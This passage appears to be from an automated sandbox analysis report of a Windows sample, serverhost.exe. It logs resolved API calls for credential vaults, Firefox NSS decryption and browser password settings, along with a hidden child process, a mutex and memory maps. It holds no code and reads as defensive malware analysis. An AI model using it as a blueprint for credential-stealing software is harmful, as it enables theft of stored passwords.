| Get Address | c:\windows\system32\shell32.dll | function = SHGetSpecialFolderPathW, address_out = 0x758c0468 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContextA, address_out = 0x764f91dd |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptReleaseContext, address_out = 0x764fe124 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptCreateHash, address_out = 0x764fdf4e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptGetHashParam, address_out = 0x764fdf7e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptHashData, address_out = 0x764fdf36 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDestroyHash, address_out = 0x764fdf66 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredReadA, address_out = 0x765371c1 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredFree, address_out = 0x764fb2ec |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredDeleteA, address_out = 0x76537941 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredEnumerateA, address_out = 0x76537381 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredEnumerateW, address_out = 0x76537481 |
|
1 | |
| Get Address | c:\windows\system32\pstorec.dll | function = PStoreCreateInstance, address_out = 0x71ec526c |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultOpenVault, address_out = 0x6f4d26a9 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultCloseVault, address_out = 0x6f4d2718 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultEnumerateItems, address_out = 0x6f4d3099 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultFree, address_out = 0x6f4d4321 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultGetInformation, address_out = 0x6f4d24c0 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultGetItem, address_out = 0x6f4d3242 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = NSS_Init, address_out = 0x6332d70b |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = NSS_Shutdown, address_out = 0x6332d13c |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_GetInternalKeySlot, address_out = 0x632c3c51 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_FreeSlot, address_out = 0x632c3333 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_CheckUserPassword, address_out = 0x632acbc4 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_Authenticate, address_out = 0x632ad3ca |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11SDR_Decrypt, address_out = 0x632c00a7 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_open, address_out = 0x633d1ca0 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_prepare, address_out = 0x6335ce70 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_step, address_out = 0x633c5200 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_column_text, address_out = 0x6337d400 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_column_int, address_out = 0x6337d3a0 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_column_int64, address_out = 0x6337d3d0 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_finalize, address_out = 0x633a9f60 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_close, address_out = 0x633abde0 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_exec, address_out = 0x633aa270 |
|
1 | |
| Get Address | c:\windows\system32\psapi.dll | function = GetModuleBaseNameW, address_out = 0x773f152c |
|
1 | |
| Get Address | c:\windows\system32\psapi.dll | function = EnumProcessModules, address_out = 0x773f1408 |
|
1 | |
| Get Address | c:\windows\system32\psapi.dll | function = GetModuleFileNameExW, address_out = 0x773f13f0 |
|
1 | |
| Get Address | c:\windows\system32\psapi.dll | function = EnumProcesses, address_out = 0x773f1544 |
|
1 | |
| Get Address | c:\windows\system32\psapi.dll | function = GetModuleInformation, address_out = 0x773f1420 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessTimes, address_out = 0x765cf626 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = ShowInfoTip, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = ShowTimeInGMT, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = LoadPasswordsIE, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = LoadPasswordsChrome, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = LoadPasswordsOpera, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = LoadPasswordsSafari, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = LoadPasswordsYandex, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = UseChromeProfileFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = UseOperaPasswordFile, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = FirefoxProfileFolder |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = FirefoxInstallFolder |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = ChromeProfileFolder |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = OperaPasswordFile |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = SaveFileEncoeding, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = WinPos |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = Columns |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile0, key_name = Path, data_out = Profiles/zp0p8bce.default |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile0, key_name = IsRelative, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile1, key_name = Path |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile1, key_name = IsRelative, default_value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:47, Reason: Autostart |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:38 |
| Information | Value |
|---|---|
| PID | 0x744 |
| Parent PID | 0x600 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
748
0x
784
0x
7B0
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00040000 | 0x000a6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x00177fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000190000 | 0x00190000 | 0x00196fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| windowsshell.manifest | 0x001d0000 | 0x001d0fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003f0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| rpcss.dll | 0x00400000 | 0x0045bfff | Memory Mapped File | Readable |
|
|
|
|
| rpcss.dll | 0x00400000 | 0x0045bfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x00400fff | Pagefile Backed Memory | Readable |
|
|
|
|
| cversions.1.db | 0x00410000 | 0x00413fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x00418fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x0041cfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db | 0x00420000 | 0x0043cfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000440000 | 0x00440000 | 0x00440fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000450000 | 0x00450000 | 0x00473fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000450000 | 0x00450000 | 0x00461fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000470000 | 0x00470000 | 0x00481fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000480000 | 0x00480000 | 0x00488fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000490000 | 0x00490000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000590000 | 0x00590000 | 0x005b3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000590000 | 0x00590000 | 0x005a1fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005b0000 | 0x005b0000 | 0x005bcfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006d0000 | 0x006d0000 | 0x00717fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000720000 | 0x00720000 | 0x0072ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000750000 | 0x00750000 | 0x0075ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000760000 | 0x00760000 | 0x008affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000760000 | 0x00760000 | 0x0083efff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000870000 | 0x00870000 | 0x008affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000008b0000 | 0x008b0000 | 0x009affff | Private Memory | Readable, Writable |
|
|
|
|
| serverhost.exe | 0x009e0000 | 0x009fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x015fffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001600000 | 0x01600000 | 0x019f2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01a00000 | 0x01ccefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01d17fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e30000 | 0x01e30000 | 0x01f2ffff | Private Memory | Readable, Writable |
|
|
|
|
| imageres.dll | 0x6d1b0000 | 0x6e505fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apphelp.dll | 0x711a0000 | 0x711ebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x71b80000 | 0x71c03fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imageres.dll | 0x71c90000 | 0x72fe5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntmarta.dll | 0x73790000 | 0x737b0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| windowscodecs.dll | 0x73a40000 | 0x73b3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| uxtheme.dll | 0x73ea0000 | 0x73edffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| propsys.dll | 0x73ee0000 | 0x73fd4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x74020000 | 0x741bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74f70000 | 0x74f8afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74f90000 | 0x74f9bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| profapi.dll | 0x75040000 | 0x7504afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| devobj.dll | 0x75150000 | 0x75161fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x751a0000 | 0x751e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cfgmgr32.dll | 0x75310000 | 0x75336fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x75340000 | 0x753dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x753e0000 | 0x7546efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wldap32.dll | 0x754a0000 | 0x754e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x754f0000 | 0x75590fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x756a0000 | 0x7573cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75740000 | 0x76389fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76390000 | 0x7645bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76500000 | 0x765d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x767fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76800000 | 0x7695bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76970000 | 0x769f2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76bc0000 | 0x76bc9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x76bd0000 | 0x76c98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| setupapi.dll | 0x76ca0000 | 0x76e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x76e40000 | 0x76eebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x76ef0000 | 0x7702bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x77030000 | 0x77048fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x77060000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x770d0000 | 0x7711dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apisetschema.dll | 0x77130000 | 0x77130fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\email.doc | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\a\foobar.bmp | desired_access = GENERIC_READ |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | os_pid = 0x73c, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x76bd0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76500000 |
|
2 | |
| Load | ADVAPI32.dll | base_address = 0x75340000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x77060000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x76ef0000 |
|
1 | |
| Get Handle | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | base_address = 0x9e0000 |
|
1 | |
| Get Filename | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\user32.dll | function = ReleaseCapture, address_out = 0x76c069f2 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetProcessWindowStation, address_out = 0x76bddfdc |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetCaretBlinkTime, address_out = 0x76be0d01 |
|
1 | |
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef4bc |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef4dc |
|
1 | ||
| Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2ef5bc |
|
1 | ||
| Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2ef5bc |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef5bc |
|
1 | ||
| Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x2ef5bc |
|
1 | ||
| Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef5bc |
|
1 | ||
| Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef5bc |
|
1 | ||
| Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef5bc |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765533f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameA, address_out = 0x76536ba9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7654ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x76538c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x765abfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameExA, address_out = 0x7658f41f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x7654cf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7654cee8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x7536a4b4 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x7706d250 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x76f37690 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x7653480b |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
1 | |
| Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MA991ED3B |
|
1 |
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:25 |
| Information | Value |
|---|---|
| PID | 0x73c |
| Parent PID | 0x744 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
780
0x
560
0x
330
0x
338
0x
510
0x
51C
0x
524
0x
50C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000040000 | 0x00040000 | 0x00040fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000180000 | 0x00180000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00280000 | 0x002e6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003b7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| windowsshell.manifest | 0x003d0000 | 0x003d0fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x00400fff | Pagefile Backed Memory | Readable |
|
|
|
|
| cversions.1.db | 0x00410000 | 0x00413fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x00418fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x0041cfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000420000 | 0x00420000 | 0x00420fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000440000 | 0x00440000 | 0x00540fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000550000 | 0x00550000 | 0x00942fff | Pagefile Backed Memory | Readable |
|
|
|
|
| rpcss.dll | 0x00950000 | 0x009abfff | Memory Mapped File | Readable |
|
|
|
|
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db | 0x00950000 | 0x0096cfff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000970000 | 0x00970000 | 0x00993fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000970000 | 0x00970000 | 0x00981fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000990000 | 0x00990000 | 0x009a1fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009a0000 | 0x009a0000 | 0x009c3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009b0000 | 0x009b0000 | 0x009c1fff | Private Memory | Readable, Writable |
|
|
|
|
